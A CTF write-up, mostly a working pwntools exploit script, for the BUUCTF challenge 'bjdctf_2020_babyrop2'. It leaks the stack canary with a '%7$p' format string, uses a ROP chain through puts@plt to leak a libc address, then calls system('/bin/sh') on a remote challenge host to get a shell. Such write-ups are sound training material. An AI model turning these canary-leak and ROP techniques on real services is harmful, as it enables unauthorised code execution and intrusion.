开启的安全机制
main
gift
利用格式化字符串泄露canary
vuln
栈溢出泄露libc
栈溢出执行 system("/bin/sh\x00")
scanf 只允许输入 6 字节；输入格式化字符串参数后，偏移为 6 处输出的是一个地址，因此 canary 的偏移即为 7
这样输入%7$p就可以泄露canary
EXP
from pwn import *
from LibcSearcher import LibcSearcher
# Exploit flow (see the write-up above): a format-string read leaks the stack
# canary, then two stack overflows are used -- the first to leak a libc address
# via puts@plt, the second to call system("/bin/sh").
# NOTE(review): str literals are concatenated with p64() output, so this is
# written against Python 2 pwntools.
p = remote("node3.buuoj.cn",27004)
elf = ELF("./bjdctf_2020_babyrop2")
# Addresses resolved from the local copy of the challenge binary.
puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
# Gadget used to load the first argument register; offset hard-coded for this binary.
pop_rdi_ret = 0x0000000000400993
vuln_addr = elf.symbols["vuln"]
#leak canary: the "gift" input is printed back through printf, so "%7$p"
# prints the 7th format argument, which is the canary (offset derived above).
p.sendlineafter("I'll give u some gift to help u!\n","%7$p")
# Canary is printed as "0x" + 16 hex digits = 18 characters.
canary = int(p.recv(18),16)
#leak libc: overflow the vuln buffer, keep the canary intact, skip 8 bytes
# (presumably the saved rbp), then ROP: pop rdi <- puts@got ; puts@plt ;
# return into vuln so a second payload can be sent.
payload = "a"* (0x20-8) + p64(canary) + "a" * 8 + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(vuln_addr)
p.sendlineafter("Pull up your sword and tell me u story!\n",payload)
# puts prints the 6 significant bytes of the address; pad to 8 for u64.
puts_addr = u64(p.recv(6).ljust(8,"\x00"))
# Identify the remote libc from the leaked puts address and rebase symbols.
libc = LibcSearcher("puts",puts_addr)
libcbase = puts_addr - libc.dump("puts")
system = libcbase + libc.dump("system")
bin_sh = libcbase + libc.dump("str_bin_sh")
#get shell: same frame layout as above, chain is pop rdi <- "/bin/sh" ; system.
payload = "a" * (0x20 - 8) + p64(canary) + "a" * 8 + p64(pop_rdi_ret) + p64(bin_sh) + p64(system)
p.sendlineafter("Pull up your sword and tell me u story!\n",payload)
p.interactive()